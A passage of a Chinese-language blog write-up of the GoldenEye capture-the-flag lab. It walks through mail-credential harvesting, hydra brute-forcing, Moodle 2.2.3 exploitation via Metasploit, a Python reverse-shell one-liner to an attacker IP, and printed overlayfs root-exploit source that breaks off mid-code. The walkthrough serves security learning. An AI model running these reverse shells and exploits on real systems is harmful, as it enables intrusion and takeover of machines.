<p>Boris, I can break your codes!<br>.<br>retr 3<br>+OK 921 octets<br>Return-Path: <a href="mailto:&#x61;&#108;&#x65;&#99;&#64;&#x6a;&#x61;&#110;&#x75;&#115;&#x2e;&#x62;&#x6f;&#x73;&#115;">&#x61;&#108;&#x65;&#99;&#64;&#x6a;&#x61;&#110;&#x75;&#115;&#x2e;&#x62;&#x6f;&#x73;&#115;</a><br>X-Original-To: boris<br>Delivered-To: boris@ubuntu<br>Received: from janus (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with ESMTP id 4B9F4454B1<br>        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)<br>Message-Id: &lt;20180425025235.4B9F4454B1@ubuntu&gt;<br>Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)<br>From: <a href="mailto:alec@janus.boss">alec@janus.boss</a></p>
<p>Boris,</p>
<p>Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!</p>
<p>Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages….</p>
<p>PS - Keep security tight or we will be compromised.</p>
<p>谷歌翻译：<br>第一封，管理员发给鲍里斯<br>鲍里斯，这是管理员。 您可以在这里与同事和学生进行电子交流。 我不会扫描电子邮件中的安全风险，因为我信任你和这里的其他管理员。</p>
<p>第二封，natalya发给鲍里斯<br>鲍里斯，我可以破解你的</p>
<p>第三封，alec发给alec<br>鲍里斯，<br>您与我们辛迪加的合作将获得丰厚的回报。 附件是 GoldenEye 的最终访问代码。 将它们放在该服务器根目录中的隐藏文件中，然后从该电子邮件中删除。 这些访问代码只能有一组，我们需要保护它们以供最终执行。 如果他们被找回并被俘虏，我们的计划就会崩溃并付诸东流！<br>一旦 Xenia 可以访问培训站点并熟悉 GoldenEye 终端代码，我们将进入最后阶段……<br>PS - 保持安全严密，否则我们将受到威胁。！</p>
<p>我们继续访问natalya的邮件信息，获取更多线索<br>共有两封邮件<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672763800034.png" alt=""></p>
<p>+OK GoldenEye POP3 Electronic-Mail System<br>user natalya<br>+OK<br>pass bird<br>+OK Logged in.<br>list<br>+OK 2 messages:<br>1 631<br>2 1048<br>.<br>retr 1<br>+OK 631 octets<br>Return-Path: &lt;root@ubuntu&gt;<br>X-Original-To: natalya<br>Delivered-To: natalya@ubuntu<br>Received: from ok (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with ESMTP id D5EDA454B1<br>        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)<br>Message-Id: &lt;20180425024542.D5EDA454B1@ubuntu&gt;<br>Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)<br>From: root@ubuntu</p>
<p>Natalya, please you need to stop breaking boris’ codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.</p>
<p>Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.<br>.<br>retr 2<br>+OK 1048 octets<br>Return-Path: &lt;root@ubuntu&gt;<br>X-Original-To: natalya<br>Delivered-To: natalya@ubuntu<br>Received: from root (localhost [127.0.0.1])<br>        by ubuntu (Postfix) with SMTP id 17C96454B1<br>        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)<br>Message-Id: &lt;20180425031956.17C96454B1@ubuntu&gt;<br>Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)<br>From: root@ubuntu</p>
<p>Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it’s related to security…even if it’s not, just enter it in under the guise of “security”…it’ll get the change order escalated without much hassle :)</p>
<p>Ok, user creds are:</p>
<p>username: xenia<br>password: RCP90rulez!</p>
<p>Boris verified her as a valid contractor so just create the account ok?</p>
<p>And if you didn’t have the URL on outr internal Domain: severnaya-station.com/gnocertdir<br>**Make sure to edit your host file since you usually work remote off-network….</p>
<p>Since you’re a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.</p>
<p>第一封邮件，管理员发来<br>娜塔莉亚，拜托你不要再破解鲍里斯的密码了。 此外，您还是 GNO 的培训主管。 一旦学生被指定给你，我会发邮件给你。</p>
<p>另外，请注意可能的网络漏洞。 我们得到情报，名为 Janus 的犯罪集团正在追捕 GoldenEye。</p>
<p>第二封邮件，管理员发来</p>
<p>好的，纳塔琳，我有一个新学生给你。 由于这是一个新系统，如果您发现任何配置问题，请告诉我或鲍里斯，尤其是它是否与安全有关…即使不是，只需以“安全”为幌子输入它…它会 毫不费力地升级变更单:)<br>好的，用户信用是：<br>用户名：xenia<br>密码：RCP90rulez！<br>鲍里斯验证了她是一个有效的承包商所以创建帐户好吗？<br>如果您没有外部内部域的 URL：severnaya-station.com/gnocertdir<br>**确保编辑您的主机文件，因为您通常在网络外远程工作….<br>由于您是 Linux 用户，只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。</p>
<p>从中可以看到，我们可以获取到以下信息：<br>用户：xenia/RCP90rulez!<br>域：severnaya-station.com<br>网址：severnaya-station.com/gnocertdir<br>我们现根据邮件提示添加本地域名：severnaya-station.com</p>
<p>我们设置本地HOSTS文件<br>gedit /etc/hosts<br>172.16.50.129 severnaya-station.com<br>访问：<a href="http://severnaya-station.com/gnocertdir/" target="_blank" rel="noopener">http://severnaya-station.com/gnocertdir/</a></p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672765426878.png" alt=""></p>
<p>点击“Intro to GoldenEye”，进入登录页面，使用获取到的账号登录</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672765585233.png" alt=""></p>
<p>Home-My Profile-Messages，里面有一份邮件，用户名是doak，我们继续爆破此用户的邮箱口令。<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672766110936.png" alt=""><br>sudo echo doak &gt; frank.txt   —将用户名写入txt文本中<br>hydra -L frank.txt -P /usr/share/wordlists/fasttrack.txt 172.16.50.129 -s 55007 pop3<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672844837526.png" alt=""></p>
<p>[55007][pop3] host: 172.16.50.129   login: doak   password: goat<br>获得用户名口令：doak/goat</p>
<p>使用此用户账户登录查看其邮件内容<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845097713.png" alt=""></p>
<p>其中只有一份邮件<br>James,<br>If you’re reading this, congrats you’ve gotten this far. You know how tradecraft works right?</p>
<p>Because I don’t. Go to our training site and login to my account….dig until you can exfiltrate further information……</p>
<p>发现一个新的账户：<br>username: dr_doak<br>password: 4England!</p>
<h2 id="2-4-破解通过隐写术加载信息的图片"><a href="#2-4-破解通过隐写术加载信息的图片" class="headerlink" title="2.4 破解通过隐写术加载信息的图片"></a>2.4 破解通过隐写术加载信息的图片</h2><p>使用新的账户密码登录CMS<br>登录后在：Home- My home<br>右边发现： s3cret.txt<br>同时发现这是Moodle，使用的2.2.3版本</p>
<p>我们下载该文件<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845479239.png" alt=""></p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845531484.png" alt=""></p>
<p>其中内容如下：<br>007,<br>I was able to capture this apps adm1n cr3ds through clear txt.<br>Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.<br>Something juicy is located here: /dir007key/for-007.jpg<br>Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.</p>
<p>我们下载图片，进行分析，其使用隐写术将信息加载在图片中<br>severnaya-station.com/dir007key/for-007.jpg</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672845753163.png" alt=""><br>下载图片后，我们可以使用：<br>binwalk（路由逆向分析工具）<br>exiftool（图虫）<br>strings（识别动态库版本指令）<br>等查看jpg文件底层内容！</p>
<p>使用strings for-007.jpg看到图片其中隐藏的base64编码隐藏的细腻：eFdpbnRlcjE5OTV4IQ==<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846127255.png" alt=""></p>
<p>使用BurpSuite解码，获取密码：xWinter1995x!<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846254118.png" alt=""></p>
<h2 id="2-5-使用管理员账号登录后台，搜索可利用漏洞"><a href="#2-5-使用管理员账号登录后台，搜索可利用漏洞" class="headerlink" title="2.5 使用管理员账号登录后台，搜索可利用漏洞"></a>2.5 使用管理员账号登录后台，搜索可利用漏洞</h2><p>通过以上线索分析，用户极有可能是：admin，我们使用该账号登录后台<br>severnaya-station.com/gnocertdir<br>发现可以成功登录。admin/xWinter1995x!<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846394728.png" alt=""></p>
<p>后台有许多配置参数可以设置，Moodle使用的2.2.3版本的信息多次提示，我们针对这个信息进行一下搜索，发现确实存在可利用漏洞</p>
<p>第一条就是，详细信息见网址：<a href="https://www.exploit-db.com/exploits/29324" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/29324</a><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846914992.png" alt=""></p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672846975952.png" alt=""></p>
<p>Google搜索Moodle 2.2.3 exp cve 获取到以下信息：<br>CVE-2013-3630 漏洞可利用！ 编号29324</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847177987.png" alt=""></p>
<p>继续浏览发现该漏洞利用需要一个关键的参数，’s_editor_tinymce_spellengine’ =&gt; ‘PSpellShell’,，我们查看后台发现在，Home- Site administration- Plugins- Text editors- TinyMCE HTML editor可以设置给参数，保存！<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847577253.png" alt=""></p>
<h2 id="2-6-MSF进行漏洞利用获取shell"><a href="#2-6-MSF进行漏洞利用获取shell" class="headerlink" title="2.6 MSF进行漏洞利用获取shell"></a>2.6 MSF进行漏洞利用获取shell</h2><p>然后我们来利用此漏洞，使用MSF！<br>sudo msfconsole<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672847680795.png" alt=""></p>
<p>msf6 &gt; search CVE-2013-3630，查找到MSF适用于此漏洞的模块为exploit/multi/http/moodle_cmd_exec </p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848003787.png" alt=""></p>
<p>use exploit/multi/http/moodle_cmd_exec<br>set rhost severnaya-station.com<br>set targeturi /gnocertdir<br>set username admin<br>set password xWinter1995x!<br>set payload cmd/unix/reverse<br>set lhost 172.16.50.129<br>set vhost severnaya-station.com<br>run<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848181415.png" alt=""><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848227455.png" alt=""><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848334247.png" alt=""></p>
<p>执行tty，因为获得的权限无框架：执行</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="BASH"><figure class="iseeu highlight /bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">'import pty; pty.spawn("/bin/bash")'</span></span><br></pre></td></tr></table></figure></div>
<p>—将shell进行tty</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848616610.png" alt=""></p>
<h2 id="2-7-尝试nc-后台命令执行获取shell"><a href="#2-7-尝试nc-后台命令执行获取shell" class="headerlink" title="2.7 尝试nc+后台命令执行获取shell"></a>2.7 尝试nc+后台命令执行获取shell</h2><p>通过查看后台，在Site administration-Server-System paths页面<br>发现可以执行命令，我们尝试执行python反弹shell</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.50.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span><br></pre></td></tr></table></figure></div>

<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672848970306.png" alt=""></p>
<p>kali终端开启端口监听：<br>sudo nc -lvp 9999<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850247587.png" alt=""></p>
<p>在后台Home-My profile-Blogs-Add a new entry页面，点击Blog entry body区域的触发代码执行，成功反弹shell<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850201120.png" alt=""><br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672850301289.png" alt=""></p>
<h2 id="2-8-内核提权"><a href="#2-8-内核提权" class="headerlink" title="2.8 内核提权"></a>2.8 内核提权</h2><p>uname -a 查看权限！<br>Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux</p>
<p>谷歌搜索：Linux ubuntu 3.13.0-32 exploit<br>获得exp版本：37292<br>CVE(CAN) ID: CVE-2015-1328</p>
<p>该漏洞的原理搜索了解，大致如下：</p>
<p>overlayfs文件系统是一种叠合式文件系统，实现了在底层文件系统上叠加另一个文件系统。Linux 内核3.18开始已经加入了对overlayfs的支持。Ubuntu Linux内核在更早的版本就已加入该支持。</p>
<p>Ubuntu Linux内核的overlayfs文件系统实现中存在一个权限检查漏洞，本地普通用户可以获取管理员权限。此漏洞影响所有目前官方支持的Ubuntu Linux版本，目前已经发布攻击代码，建议受影响用户尽快进行升级。</p>
<p>此漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件权限。它只检查了被修改文件的属主是否有权限在上层文件系统目录写入，导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时，文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志，将允许一个普通用户在低权限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容，从而提升到管理员权限。</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672929781166.png" alt=""></p>
<p>下载该文件分析：<a href="https://www.exploit-db.com/exploits/37292" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/37292</a></p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931315571.png" alt=""></p>
<p>执行相当简单，只需要将其gcc编译，执行即可</p>
<p>查看目标机器是否有GCC编译器，发现未安装GCC，但是存在CC，可以使用CC代替GCC来使用</p>
<p><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931520579.png" alt=""></p>
<p>Kali搜索本地是否存在该可用exp，发现存在，就不需要下载了<br>searchsploit 37292        —搜索kali本地的exp库中37292攻击脚本信息<br><img src="http://zhengjie.ren/%E5%B0%8F%E4%B9%A6%E5%8C%A0/1672931116990.png" alt=""></p>
<p>但是需要修改代码，将其中GCC的参数改为CC，拷贝到当前目录中进行操作<br>sudo cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali<br>编辑其内容，第143行需要修改为CC</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># Exploit Title: ofs.c - overlayfs local root in ubuntu</span></span><br><span class="line"><span class="comment"># Date: 2015-06-15</span></span><br><span class="line"><span class="comment"># Exploit Author: rebel</span></span><br><span class="line"><span class="comment"># Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)</span></span><br><span class="line"><span class="comment"># Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04</span></span><br><span class="line"><span class="comment"># CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*</span></span><br><span class="line"><span class="comment">CVE-2015-1328 / ofs.c</span></span><br><span class="line"><span class="comment">overlayfs incorrect permission handling + FS_USERNS_MOUNT</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">user@ubuntu-server-1504:~$ uname -a</span></span><br><span class="line"><span class="comment">Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux</span></span><br><span class="line"><span class="comment">user@ubuntu-server-1504:~$ gcc ofs.c -o ofs</span></span><br><span class="line"><span class="comment">user@ubuntu-server-1504:~$ id</span></span><br><span class="line"><span class="comment">uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)</span></span><br><span class="line"><span class="comment">user@ubuntu-server-1504:~$ ./ofs</span></span><br><span class="line"><span class="comment">spawning threads</span></span><br><span class="line"><span class="comment">mount #1</span></span><br><span class="line"><span class="comment">mount #2</span></span><br><span class="line"><span class="comment">child threads done</span></span><br><span class="line"><span class="comment">/etc/ld.so.preload created</span></span><br><span class="line"><span class="comment">creating shared library</span></span><br><span class="line"><span class="comment"># id</span></span><br><span class="line"><span class="comment">uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">greets to beist &amp; kaliman</span></span><br><span class="line"><span class="comment">2015-05-24</span></span><br><span class="line"><span class="comment">%rebel%</span></span><br><span class="line"><span class="comment">*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sched.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mount.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sched.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mount.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;signal.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/sched.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> LIB <span class="meta-string">"#include &lt;unistd.h&gt;\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n&#123;\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &amp;path, 128);\nif(geteuid() == 0 &amp;&amp; !strcmp(path, \"/bin/su\")) &#123;\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n&#125;\n    return _real_getuid();\n&#125;\n"</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">char</span> child_stack[<span class="number">1024</span>*<span class="number">1024</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">int</span></span><br><span class="line">child_exec(<span class="keyword">void</span> *stuff)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">char</span> *file;</span><br><span class="line">    system(<span class="string">"rm -rf /tmp/ns_sploit"</span>);</span><br><span class="line">    <span class="built_in">mkdir</span>(<span class="string">"/tmp/ns_sploit"</span>, <span class="number">0777</span>);</span><br><span class="line">    <span class="built_in">mkdir</span>(<span class="string">"/tmp/ns_sploit/work"</span>, <span class="number">0777</span>);</span><br><span class="line">    <span class="built_in">mkdir</span>(<span class="string">"/tmp/ns_sploit/upper"</span>,<span class="number">0777</span>);</span><br><span class="line">    <span class="built_in">mkdir</span>(<span class="string">"/tmp/ns_sploit/o"</span>,<span class="number">0777</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"mount #1\n"</span>);</span><br><span class="line">    <span class="keyword">if</span> (mount(<span class="string">"overlay"</span>, <span class="string">"/tmp/ns_sploit/o"</span>, <span class="string">"overlayfs"</span>, MS_MGC_VAL, <span class="string">"lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line"><span class="comment">// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower</span></span><br><span class="line">        <span class="keyword">if</span> (mount(<span class="string">"overlay"</span>, <span class="string">"/tmp/ns_sploit/o"</span>, <span class="string">"overlay"</span>, MS_MGC_VAL, <span class="string">"lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"no FS_USERNS_MOUNT for overlayfs on this kernel\n"</span>);</span><br><span class="line">            <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        file = <span class="string">".access"</span>;</span><br><span class="line">        chmod(<span class="string">"/tmp/ns_sploit/work/work"</span>,<span class="number">0777</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> file = <span class="string">"ns_last_pid"</span>;</span><br><span class="line"></span><br><span class="line">    chdir(<span class="string">"/tmp/ns_sploit/o"</span>);</span><br><span class="line">    rename(file,<span class="string">"ld.so.preload"</span>);</span><br><span class="line"></span><br><span class="line">    chdir(<span class="string">"/"</span>);</span><br><span class="line">    umount(<span class="string">"/tmp/ns_sploit/o"</span>);</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"mount #2\n"</span>);</span><br><span class="line">    <span class="keyword">if</span> (mount(<span class="string">"overlay"</span>, <span class="string">"/tmp/ns_sploit/o"</span>, <span class="string">"overlayfs"</span>, MS_MGC_VAL, <span class="string">"lowerdir=/tmp/ns_sploit/upper,upperdir=/etc"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (mount(<span class="string">"overlay"</span>, <span class="string">"/tmp/ns_sploit/o"</span>, <span class="string">"overlay"</span>, MS_MGC_VAL, <span class="string">"lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work"</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        chmod(<span class="string">"/tmp/ns_sploit/work/work"</span>,<span class="number">0777</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    chmod(<span class="string">"/tmp/ns_sploit/o/ld.so.preload"</span>,<span class="number">0777</span>);</span><br><span class="line">    umount(<span class="string">"/tmp/ns_sploit/o"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span></span><br><span class="line">main(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">int</span> status, fd, lib;</span><br><span class="line">    <span class="keyword">pid_t</span> wrapper, init;</span><br><span class="line">    <span class="keyword">int</span> clone_flags = CLONE_NEWNS | SIGCHLD;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>,<span class="string">"spawning threads\n"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>((wrapper = fork()) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span 